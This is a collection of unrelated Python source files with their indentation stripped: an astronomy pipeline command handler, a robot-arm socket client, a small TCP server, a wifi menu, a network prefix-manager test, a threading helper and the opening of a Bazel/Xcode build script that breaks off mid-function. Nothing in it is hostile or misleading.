# add the columns in order as a single array.
# Note the contents of t[] are all unicode strings so
# we have to convert to regular strings and floats
# as appropriate
#print float(t["frequency"]), t["uid"].encode("utf8"), t["formula"].encode("utf8"), t["name"].encode("utf8"), t["transition"].encode("utf8"), float(t["velocity_raw"]), float(t["elower"]), float(t["eupper"]), float(t["linestrength"]), float(t["peakintensity_raw"]), float(t["peakoffset_raw"]), float(t["fwhm_raw"]), t["startchan"], t["endchan"], float(t["peakrms"]), t["blend"]
llbdp.addRow(LineData(
frequency=float(t["frequency"]),
uid=t["uid"].encode("utf8"),
formula=t["formula"].encode("utf8"),
name=t["name"].encode("utf8"),
transition=t["transition"].encode("utf8"),
velocity=float(t["velocity_raw"]),
energies=[float(t["elower"]), float(t["eupper"])],
linestrength=float(t["linestrength"]),
peakintensity=float(t["peakintensity_raw"]),
peakoffset=float(t["peakoffset_raw"]),
fwhm=float(t["fwhm_raw"]),
chans=[ float(t["startchan"]), float(t["endchan"])],
peakrms=float(t["peakrms"]),
blend=int(t["blend"])))
llbdp.write(self.dir()+llbdp.xmlFile)
# all tasks following LineID_AT are now stale.
self._markstalefrom(taskid)
# replace the data table in the summary
titems = self.summaryData.getItemsByTaskID(taskid);
the_item = titems.get('linelist',None)
if the_item != None:
the_item.getValue()[0] = llbdp.table.serialize()
self.write()
except Exception, e:
print "got exception on LineList_BDP write: %s" % e
traceback.print_exc()
return
elif command == "view":
#print "got command view"
try:
fullpath = str(self.dir()+payload["filename"])
logging.info("Opening file: %s" % fullpath)
import casa
axes = {'x':'x','y':'y','z':'z'}
casa.imview(raster=fullpath,axes=axes)
except Exception, e:
print "got exception on viewer launch: %s" % e
traceback.print_exc()
return
elif command == "forcereject":
taskid = payload["taskid"]
rows = payload["rows"]
#if "uuid" in payload:
# uid = payload["uuid"]
#else:
# print "couldn't find uuid"
# uid=None
# @TODO the spectral image may no longer be correct,
# if we are forcing or rejecting lines
# these are a lists of tuples
currentforce = self.fm[taskid].getkey('force')
currentreject = self.fm[taskid].getkey('reject')
# we append the submitted force/reject to the existing keyword
for t in rows:
if t['disposition'] == 'force':
currentforce.append( (float(t["frequency"]), t["uid"].encode("utf8"), t["formula"].encode("utf8"),\
t["name"].encode("utf8"), t["transition"].encode("utf8"), \
float(t["velocity_raw"]), float(t["startchan"]), float(t["endchan"])))
elif t['disposition'] == 'reject':
if t['frequency'].encode('utf8') == "None":
currentreject.append((t['name'].encode('utf8'), None))
else:
currentreject.append((t['name'].encode('utf8'), float(t['frequency'])))
else: # for 'accept' do nothing
continue
# remove duplicates
currentforce = list(set(currentforce))
currentreject = list(set(currentreject))
self.fm[taskid].setkey('force',currentforce)
self.fm[taskid].setkey('reject',currentreject)
self._markstalefrom(taskid)
# in this case the root task is also stale
self.fm[taskid].markChanged()
if len(currentforce) != 0:
logging.info("Set force = %s for task %d" % (self.fm[taskid].getkey('force'),taskid))
if len(currentreject) != 0:
logging.info("Set reject = %s for task %d" % (self.fm[taskid].getkey('reject'),taskid))
self.writeXML()
# don't rewrite the lineIDeditor file because we just want to update the JSON
# and not lose the user's edits
#if uid == -1 or uid == '-1': uid = None
self.summaryData.html(self.dir(), self.fm, self._dotdiagram(), False)
self.atToHTML()
self.logToHTML()
elif command == "exportfits":
try:
casaimage = self.dir(str(payload["casaimage"]))
fitsimage = self.dir(str(payload["fitsimage"]))
logging.info("exporting CASA image %s to FITS %s" % (casaimage,fitsimage))
# @todo add a checkbox or something to html to select overwrite
# this requires some customization of the input tag, e.g.
#http://duckranger.com/2012/06/pretty-file-input-field-in-bootstrap/
#http://www.abeautifulsite.net/whipping-file-inputs-into-shape-with-bootstrap-3/ [bootstrap 3 only]
#http://stackoverflow.com/questions/11235206/twitter-bootstrap-form-file-element-upload-button
import casa
casa.exportfits(casaimage,fitsimage,overwrite=False)
except Exception, e:
print "got exception on exportfits: %s" % e
traceback.print_exc()
return
else:
print "Unrecognized command %s" % command
def _dotdiagram(self):
"""Returns the default dot diagram file name.
Parameters
----------
None
"""
return self.dir()+'admit.png'
def _markstalefrom(self,taskid):
"""Mark as stale all tasks downstream from given taskid, not including
the root task.
Parameters
----------
taskid: int
The task ID of the root task.
Returns
-------
None
"""
nowstale = self.fm.downstream(taskid)
for tid in nowstale:
# don't mark the root LineID_AT as stale
if tid == taskid:
continue
# but mark all it's children as stale
self.fm[tid].markChanged()
def _serveforever(self):
"""
Method passed to thread by startDataServer.
Notes
-----
Should not be called directly.
"""
self._server.serve_forever()
def setAstale(self, astale, verbose=False, dryrun = False):
"""
Method to toggle the stale flags on all tasks based on a global admit stale
for the sole purpose of admit_export to work. It is dangerous to call this
routine when not all tasks are either stale or not stale.
This function needs to be called with True first, so it makes a stale backup,
then during the 2nd False call, the stale backup is pushed back.
@todo This is a patch solution for admit 1.1 - general solution needed
"""
cnt0 = len(self.fm._tasks.keys())
cnt1 = 0 # stale
cnt2 = 0 # running? (if it did, those crashed)
cnt3 = 0 # enabled
if astale:
self.old = {}
for t in self:
if self[t].isstale(): cnt1 += 1
if self[t].running(): cnt2 += 1
if self[t].enabled(): cnt3 += 1
if astale:
self.old[t] = self[t].isstale()
if dryrun:
print "ADMIT_STALE: %d/%d were stale ; %d running, %d enabled, current setting is %d" % (cnt1,cnt0,cnt2,cnt3,self.astale)
return
if verbose:
print "ADMIT_STALE: %d/%d were stale ; setting to %d" % (cnt1,cnt0,astale)
if astale:
self.astale = 1
for t in self:
self[t].markChanged()
else:
self.astale = 0
for t in self:
if self.old[t]:
self[t].markChanged()
else:
self[t].markUpToDate()
if __name__ == "__main__":
print "MAIN not active yet, but this is where it will go"
|
Hiwin_RT605_ArmCommand_Socket_20190628090524.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
##多執行序
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcm_2d as TCP
import HiwinRA605_socket_Taskcmd_2 as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
#Socket = 0
#data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
NAME = 'socket_server'
arm_mode_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
class client():
def __init__(self):
#self.get_connect()
pass
def get_connect(self):
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect(('192.168.0.1', 8080))
def send(self, msg):
self.s.send(msg.encode('utf-8')) #用utf-8來encode,還有其他encode的方法,str用utf-8就OK!
def get_recieve(self):
data = self.s.recv(1024) #1024指定buffer的大小,限制一次收多少
data.decode('utf-8')
return data
def close(self):
self.s.close()
Socket = client()
def point_data(x,y,z,pitch,roll,yaw): ##接收策略端傳送位姿資料
pos.x = x
pos.y = y
pos.z = z
pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = action
socket_cmd.grip = grip
socket_cmd.ra = ra
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ##接收策略端傳送手臂模式資料
socket_cmd.Speedmode = speedmode
def socket_talker(): ##創建Server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
pub.publish(state)
rate.sleep()
##----------socket 封包傳輸--------------##
##---------------socket 傳輸手臂命令-----------------
def Socket_command():
global Socket
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 6 ##切換初始mode狀態
print(data)
print("Socket:", Socket)
#Socket.send(data.encode('utf-8'))#socket傳送for python to translate str
Socket.send(data)
##-----------socket client--------
def socket_client():
global Socket
try:
#Socket = client()
Socket.get_connect()
#Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
print('Connection has been successful')
except socket.error as msg:
print(msg)
sys.exit(1)
#print('Connection has been successful')
Socket_feedback(Socket)
rospy.on_shutdown(myhook)
Socket.close()
def Socket_feedback(s):
Socket = s
while 1:
feedback_str = Socket.get_recieve()
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令
state_feedback.ArmState = 0
if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令
state_feedback.ArmState = 1
if str(feedback_str[2]) == '54':# 6 策略完成
state_feedback.ArmState = 6
print("shutdown")
#確認傳送旗標
if str(feedback_str[4]) == '48':#回傳0 false
state_feedback.SentFlag = 0
if str(feedback_str[4]) == '49':#回傳1 true
state_feedback.SentFlag = 1
##---------------socket 傳輸手臂命令 end-----------------
if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
break
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 6##切換初始mode狀態
## 多執行緒
t = threading.Thread(target=socket_client)
t.start() # 開啟多執行緒
#time.sleep(1)
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
## 多執行序 end
|
server-tcp.py
|
import socket
import threading
bind_ip = ""
bind_port = 60007
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip, bind_port))
server.listen(5)
print("[*] Listening on %s:%d" % (bind_ip, bind_port))
def handle_client(client_socket):
request = client_socket.recv(1024).decode()
print("[*] Received: %s" % request)
send_data = "ACK!"
client_socket.send(send_data.encode())
print(client_socket.getpeername())
client_socket.close()
while True:
client, addr = server.accept()
print("[*] Accepted connect from: %s:%d" % (addr[0], addr[1]))
client_handler = threading.Thread(target=handle_client, args=(client,))
client_handler.start()
|
wifi_setup.py
|
import os
import imp
import sys
import time
import threading
# usb or sd card
user_dir = os.getenv("USER_DIR", "/usbdrive")
# imports
current_dir = os.path.dirname(os.path.abspath(__file__))
og = imp.load_source('og', current_dir + '/og.py')
wifi = imp.load_source('wifi_control', current_dir + '/wifi_control.py')
wifi.log_file = user_dir + "/wifi_log.txt"
# UI elements
menu = og.Menu()
banner = og.Alert()
# lock for updating menu
menu_lock = threading.Lock()
def quit():
og.end_app()
# stores possible networks
# used to build wifi menu
# contains connect callback
class WifiNet :
ssid = ''
pw = ''
def connect (self):
wifi.connect(self.ssid, self.pw)
update_menu()
og.redraw_flag = True
def disconnect():
print "wifi disconnect all"
wifi.disconnect_all()
update_menu()
og.redraw_flag = True
def start_web():
print "start web"
wifi.start_web_server()
update_menu()
og.redraw_flag = True
def stop_web():
print "stop web"
wifi.stop_web_server()
update_menu()
og.redraw_flag = True
def start_ap():
print "start ap"
wifi.start_ap_server()
update_menu()
og.redraw_flag = True
def stop_ap():
print "stop ap"
wifi.stop_ap_server()
update_menu()
og.redraw_flag = True
# update menu based on connection status
def update_menu():
dots = ['.','..','...','....']
menu_lock.acquire()
try :
# update wifi network labels
if (wifi.state == wifi.CONNECTING) :
menu.header = 'Connecting'+dots[wifi.connecting_timer % 4]
update_net_status_label('.')
elif (wifi.state == wifi.CONNECTED) :
menu.header = 'Connected ' + wifi.current_net
update_net_status_label('*')
elif (wifi.state == wifi.DISCONNECTING) :
menu.header = 'Disconnecting..'
update_net_status_label('-')
elif (wifi.state == wifi.CONNECTION_ERROR) :
menu.header = 'Problem Connecting'
update_net_status_label('-')
else :
menu.header = 'Not Connected'
update_net_status_label('-')
# update webserver menu entry
if (wifi.web_server_state == wifi.WEB_SERVER_RUNNING) :
update_web_server_menu_entry(True)
else :
update_web_server_menu_entry(False)
# update webserver menu entry
if (wifi.ap_state == wifi.AP_RUNNING) :
update_ap_menu_entry(True)
else :
update_ap_menu_entry(False)
finally :
menu_lock.release()
# show connected status for each network
def update_net_status_label(stat):
# check entries that have stashed net info (I know)
for i in range(len(menu.items)) :
try :
if (menu.items[i][2]['type'] == 'net') :
if (menu.items[i][2]['ssid'] == wifi.current_net) :
menu.items[i][0] = ' '+stat+' ' + menu.items[i][2]['ssid']
else :
menu.items[i][0] = ' - ' + menu.items[i][2]['ssid']
except :
pass
def update_web_server_menu_entry(stat):
if (stat) :
label = 'Stop Web Server'
action = stop_web
else :
label = 'Start Web server'
action = start_web
for i in range(len(menu.items)) :
try :
if (menu.items[i][2]['type'] == 'web_server_control') :
menu.items[i][0] = label
menu.items[i][1] = action
except :
pass
def update_ap_menu_entry(stat):
if (stat) :
label = 'Stop AP'
action = stop_ap
else :
label = 'Start AP'
action = start_ap
for i in range(len(menu.items)) :
try :
if (menu.items[i][2]['type'] == 'ap_control') :
menu.items[i][0] = label
menu.items[i][1] = action
except :
pass
# bg connection checker
def check_status():
while True:
time.sleep(1)
wifi.update_state()
update_menu()
og.redraw_flag = True
def non():
pass
def error_wifi_file() :
og.clear_screen()
og.println(0, "Error with wifi.txt")
og.println(2, "Please check file")
og.println(3, "is in the correct")
og.println(4, "format.")
og.flip()
og.enc_input()
quit()
# build main menu
menu.items = []
menu.header='Not Connected'
# start it up
og.start_app()
# check for wifi file, create one if not found
wifi_file = user_dir + "/wifi.txt"
if os.path.exists(wifi_file):
f = open(user_dir + "/wifi.txt", "r")
else :
print "wifi file not found, creating"
f = open(user_dir + "/wifi.txt", "w")
f.write("Network Name\n")
f.write("password\n")
f.close()
f = open(user_dir + "/wifi.txt", "r")
try :
networks = f.readlines()
networks = [x.strip() for x in networks]
ssids = networks[0::2]
pws = networks[1::2]
for i in range(len(ssids)) :
if (ssids[i] != '') :
ssid = ssids[i]
pw = pws[i]
net = WifiNet()
net.ssid = ssid
net.pw = pw
menu.items.append([' - ' + ssid, net.connect, {'type':'net', 'ssid':ssid}]) # stash some extra info with these net entries
except :
error_wifi_file()
print "bad wifi file"
menu.items.append(['Start Web Server', non, {'type':'web_server_control'}])
menu.items.append(['Start AP', non, {'type':'ap_control'}])
menu.items.append(['Turn Wifi Off', disconnect])
menu.items.append(['< Home', quit])
menu.selection = 0
# bg thread
menu_updater = threading.Thread(target=check_status)
menu_updater.daemon = True # stop the thread when we exit
wifi.initialize_state()
update_menu()
og.redraw_flag = True
# start thread to update connection status
menu_updater.start()
# enter menu
menu.perform()
|
prefix_mgr_client_tests.py
|
#!/usr/bin/env python
#
# Copyright (c) 2014-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from openr.utils import socket
from openr.clients import prefix_mgr_client
from openr.PrefixManager import ttypes as prefix_mgr_types
from openr.Lsdb import ttypes as lsdb_types
from openr.cli.utils.utils import ip_str_to_prefix, sprint_prefix
import zmq
import unittest
from multiprocessing import Process
prefix_entry1 = lsdb_types.PrefixEntry(
prefix=ip_str_to_prefix('2620:0:1cff:dead:bef1:ffff:ffff:1/128'),
type=lsdb_types.PrefixType.LOOPBACK)
prefix_entry2 = lsdb_types.PrefixEntry(
prefix=ip_str_to_prefix('2620:0:1cff:dead:bef1:ffff:ffff:2/128'),
type=lsdb_types.PrefixType.LOOPBACK)
prefix_entry3 = lsdb_types.PrefixEntry(
prefix=ip_str_to_prefix('2620:0:1cff:dead:bef1:ffff:ffff:3/128'),
type=lsdb_types.PrefixType.LOOPBACK)
class PrefixMgr():
def __init__(self, zmq_ctx, url):
self._prefix_mgr_server_socket = socket.Socket(zmq_ctx, zmq.REP)
self._prefix_mgr_server_socket.bind(url)
self._prefix_map = {sprint_prefix(prefix_entry1.prefix): prefix_entry1,
sprint_prefix(prefix_entry2.prefix): prefix_entry2,
sprint_prefix(prefix_entry3.prefix): prefix_entry3}
def process_request(self):
req = self._prefix_mgr_server_socket.recv_thrift_obj(
prefix_mgr_types.PrefixManagerRequest)
if req.cmd == prefix_mgr_types.PrefixManagerCommand.ADD_PREFIXES:
for prefix_entry in req.prefixes:
self._prefix_map[sprint_prefix(prefix_entry.prefix)] = prefix_entry
self._prefix_mgr_server_socket.send_thrift_obj(
prefix_mgr_types.PrefixManagerResponse(success=True))
if req.cmd == prefix_mgr_types.PrefixManagerCommand.WITHDRAW_PREFIXES:
success = False
for prefix_entry in req.prefixes:
prefix_str = sprint_prefix(prefix_entry.prefix)
if prefix_str in self._prefix_map:
del self._prefix_map[prefix_str]
success = True
self._prefix_mgr_server_socket.send_thrift_obj(
prefix_mgr_types.PrefixManagerResponse(success=success))
if req.cmd == prefix_mgr_types.PrefixManagerCommand.GET_ALL_PREFIXES:
resp = prefix_mgr_types.PrefixManagerResponse()
resp.prefixes = self._prefix_map.values()
resp.success = True
self._prefix_mgr_server_socket.send_thrift_obj(resp)
class TestPrefixMgrClient(unittest.TestCase):
def test(self):
PrefixMgr(zmq.Context(), "tcp://*:5000")
num_req = 5
def _prefix_mgr_server():
prefix_mgr_server = PrefixMgr(zmq.Context(), "tcp://*:5000")
for _ in range(num_req):
prefix_mgr_server.process_request()
def _prefix_mgr_client():
prefix_mgr_client_inst = prefix_mgr_client.PrefixMgrClient(
zmq.Context(), "tcp://localhost:5000")
resp = prefix_mgr_client_inst.add_prefix(
'2620:0:1cff:dead:bef1:ffff:ffff:4/128')
self.assertTrue(resp.success)
resp = prefix_mgr_client_inst.view_prefix()
prefix_entry4 = lsdb_types.PrefixEntry(
prefix=ip_str_to_prefix('2620:0:1cff:dead:bef1:ffff:ffff:4/128'),
type=lsdb_types.PrefixType.LOOPBACK)
self.assertTrue(resp.success)
self.assertTrue(prefix_entry4 in resp.prefixes)
resp = prefix_mgr_client_inst.withdraw_prefix(
'2620:0:1cff:dead:bef1:ffff:ffff:4/128')
self.assertTrue(resp.success)
resp = prefix_mgr_client_inst.view_prefix()
self.assertTrue(resp.success)
self.assertFalse(prefix_entry4 in resp.prefixes)
resp = prefix_mgr_client_inst.withdraw_prefix(
'2620:0:1cff:dead:bef1:ffff:ffff:5/128')
self.assertFalse(resp.success)
p = Process(target=_prefix_mgr_server)
p.start()
q = Process(target=_prefix_mgr_client)
q.start()
p.join()
q.join()
|
threaded.py
|
# -*- coding: utf-8 -*-
import logging
import time
from threading import Condition
from threading import Thread
logging.getLogger(__name__).setLevel(logging.INFO) # DEBUG, INFO, WARNING, ERROR, CRITICAL
class Threaded(object):
"""Provides a _thread which executes the _run() method at regular intervals.
Features:
- Thread supervision by ThreadMonitor
- Correct logging when exception occurs
- Thread reacts immediately on exit loop request (_thread_should_run)
"""
log = logging.getLogger(__name__)
def __init__(self, control_interval_in_seconds=4.0, thread_monitor=None, **kwargs):
super(Threaded, self).__init__(**kwargs)
self._thread_monitor = thread_monitor # type: ThreadMonitor
self._thread = None # type: Thread # Thread executing the needed behavior
self._thread_should_run = True # Controls the loop of the _thread
self._thread_left_run_loop = False # Set to true when _thread is leaving run loop
self._control_interval_in_seconds = control_interval_in_seconds # Time to wait until next processing
self._sleep_condition = Condition()
def setup_thread(self, name=None, thread_monitor=None):
if thread_monitor:
assert not self._thread_monitor, 'Thread monitor should be initialized only once!'
self._thread_monitor = thread_monitor
if not name:
name = self.__class__.__name__
# Create a _thread that regularly polls the actual parameters of the real battery
self._thread = Thread(target=self._run_with_exception_logging, name=name)
# Close _thread as soon as main _thread exits
self._thread.setDaemon(True)
if self._thread_monitor:
# Register _thread for later monitor of itself. Thread monitor allows to take action
# in case the _thread crashes.
self._thread_monitor.register(self._thread)
def start_thread(self):
if self._thread is None:
self.log.warning('Thread not created. Calling setThread() for you!')
self.setup_thread()
# Reset run attributes
self._thread_should_run = True
self._thread_left_run_loop = False
self._thread.start()
def stop_thread(self):
# Remove _thread from monitor
if self._thread_monitor:
self._thread_monitor.deregister(self._thread)
# Tell _thread it should leave
self._thread_should_run = False
# Wait until it is gone
if self._thread.is_alive():
self.wait_on_thread_to_leave()
# Delete instance
del self._thread
self._thread = None
def wakeup_thread(self):
"""Wakes up _thread in case it is sleeping.
"""
# Release _thread waiting on condition
with self._sleep_condition:
self._sleep_condition.notify()
def join(self):
"""Wait for the internal _thread until it leaves.
Call stop_thread() to properly and quickly stop the internal _thread.
"""
if self._thread:
self._thread.join()
def _run_with_exception_logging(self):
"""Same as _run but logs exceptions to the console or log file.
This is necessary when running in testing/production environment.
In case of an exception thrown, the stack trace can be seen in the
log file. Otherwise there is no info why the _thread did stop.
"""
try:
self._run()
except Exception as e:
logging.error(e, exc_info=True)
finally:
# Wait here for a while. If leaving the method directly, the _thread
# gets deleted and the is_alive() method won't work any more!
time.sleep(5)
return
def _thread_sleep_interval(self, sleep_interval_in_seconds=None):
"""Tells the executing _thread how long to sleep while being still reactive on _thread_should_run attribute.
"""
if sleep_interval_in_seconds is not None:
waitTime = sleep_interval_in_seconds
else:
waitTime = self._control_interval_in_seconds
if self._sleep_condition.acquire(blocking=False):
# Sleep the time given. Thread can be waken up with self._sleep_condition.notify()
# see wakeup_thread()
try:
self._sleep_condition.wait(timeout=waitTime)
except RuntimeError as e: # pragma: no cover
self.log.exception(e)
finally:
self._sleep_condition.release()
return True
else:
self.log.error('Could not acquire sleep condition!') # pragma: no cover
return False # pragma: no cover
def _run(self):
assert False, 'Method needs to be implemented in derived class!'
""" Example loop:
while self._thread_should_run:
# Add your stuff here
print('Executes in a regular manner')
# Wait until next interval begins
if self._thread_should_run:
self._thread_sleep_interval()
self._thread_left_run_loop = True
"""
def wait_on_thread_to_leave(self, timeout=3):
"""Can be called to wait for the _thread until it left the run loop.
Replacement for self._thread.join() self._thread.join() is
reacting slowly! Replaced it with this method.
"""
wait_time = timeout
decr_value = 0.2
if self._thread_left_run_loop:
return
while wait_time > 0:
time.sleep(decr_value)
wait_time -= decr_value
if self._thread_left_run_loop:
break
|
bazel_build.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2016 The Tulsi Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Bridge between Xcode and Bazel for the "build" action."""
import atexit
import errno
import fcntl
import hashlib
import inspect
import io
import json
import os
import pipes
import plistlib
import re
import shutil
import signal
import subprocess
import sys
import textwrap
import threading
import time
import zipfile
from apfs_clone_copy import CopyOnWrite
import bazel_build_events
import bazel_build_settings
import bazel_options
from bootstrap_lldbinit import BootstrapLLDBInit
from bootstrap_lldbinit import TULSI_LLDBINIT_FILE
import tulsi_logging
from update_symbol_cache import UpdateSymbolCache
# List of frameworks that Xcode injects into test host targets that should be
# re-signed when running the tests on devices.
XCODE_INJECTED_FRAMEWORKS = [
'libXCTestBundleInject.dylib',
'libXCTestSwiftSupport.dylib',
'IDEBundleInjection.framework',
'XCTAutomationSupport.framework',
'XCTest.framework',
]
_logger = None
def _PrintUnbuffered(msg):
sys.stdout.write('%s\n' % msg)
sys.stdout.flush()
def _PrintXcodeWarning(msg):
sys.stdout.write(':: warning: %s\n' % msg)
sys.stdout.flush()
def _PrintXcodeError(msg):
sys.stderr.write(':: error: %s\n' % msg)
sys.stderr.flush()
def _Fatal(msg, fatal_frame=None):
"""Print a fatal error pointing to the failure line inside the script."""
if not fatal_frame:
fatal_frame = inspect.currentframe().f_back
filename, line_number, _, _, _ = inspect.getframeinfo(fatal_frame)
_PrintUnbuffered('%s:%d: error: %s' % (os.path.abspath(filename),
line_number, msg))
CLEANUP_BEP_FILE_AT_EXIT = False
# Function to be called atexit to clean up the BEP file if one is present.
# This is especially useful in cases of abnormal termination (such as what
# happens when Xcode is killed).
def _BEPFileExitCleanup(bep_file_path):
if not CLEANUP_BEP_FILE_AT_EXIT:
return
try:
os.remove(bep_file_path)
except OSError as e:
_PrintXcodeWarning('Failed to remove BEP file from %s. Error: %s' %
(bep_file_path, e.strerror))
def _InterruptHandler(signum, frame):
"""Gracefully exit on SIGINT."""
del signum, frame # Unused.
_PrintUnbuffered('Caught interrupt signal. Exiting...')
sys.exit(0)
def _FindDefaultLldbInit():
"""Returns the path to the primary lldbinit file that Xcode would load or None when no file exists."""
for lldbinit_shortpath in ['~/.lldbinit-Xcode', '~/.lldbinit']:
lldbinit_path = os.path.expanduser(lldbinit_shortpath)
if os.path.isfile(lldbinit_path):
return lldbinit_path
return None
class Timer(object):
"""Simple profiler."""
def __init__(self, action_name, action_id):
"""Creates a new Timer object.
Args:
action_name: A human-readable action name, shown in the build log.
action_id: A machine-readable action identifier, can be used for metrics.
Returns:
A Timer instance.
Raises:
RuntimeError: if Timer is created without initializing _logger.
"""
if _logger is None:
raise RuntimeError('Attempted to create Timer without a logger.')
self.action_name = action_name
self.action_id = action_id
self._start = None
def Start(self):
self._start = time.time()
return self
def End(self, log_absolute_times=False):
end = time.time()
seconds = end - self._start
if log_absolute_times:
_logger.log_action(self.action_name, self.action_id, seconds,
self._start, end)
else:
_logger.log_action(self.action_name, self.action_id, seconds)
def _LockFileCreate():
# This relies on this script running at the root of the bazel workspace.
cwd = os.environ['PWD']
cwd_hash = hashlib.sha256(cwd.encode()).hexdigest()
return '/tmp/tulsi_bazel_build_{}.lock'.format(cwd_hash)
# Function to be called atexit to release the file lock on script termination.
def _LockFileExitCleanup(lock_file_handle):
lock_file_handle.close()
def _LockFileAcquire(lock_path):
"""Force script to wait on file lock to serialize build target actions.
Args:
lock_path: Path to the lock file.
"""
_PrintUnbuffered('Queuing Tulsi build...')
lockfile = open(lock_path, 'w')
# Register "fclose(...)" as early as possible, before acquiring lock.
atexit.register(_LockFileExitCleanup, lockfile)
while True:
try:
fcntl.lockf(lockfile, fcntl.LOCK_EX | fcntl.LOCK_NB)
break
except IOError as err:
if err.errno != errno.EAGAIN:
raise
else:
time.sleep(0.1)
class CodesignBundleAttributes(object):
"""Wrapper class for codesigning attributes of a signed bundle."""
# List of codesigning attributes that this script requires.
_ATTRIBUTES = ['Authority', 'Identifier', 'TeamIdentifier']
def __init__(self, codesign_output):
self.attributes = {}
pending_attributes = list(self._ATTRIBUTES)
for line in codesign_output.split('\n'):
if not pending_attributes:
break
for attribute in pending_attributes:
if line.startswith(attribute):
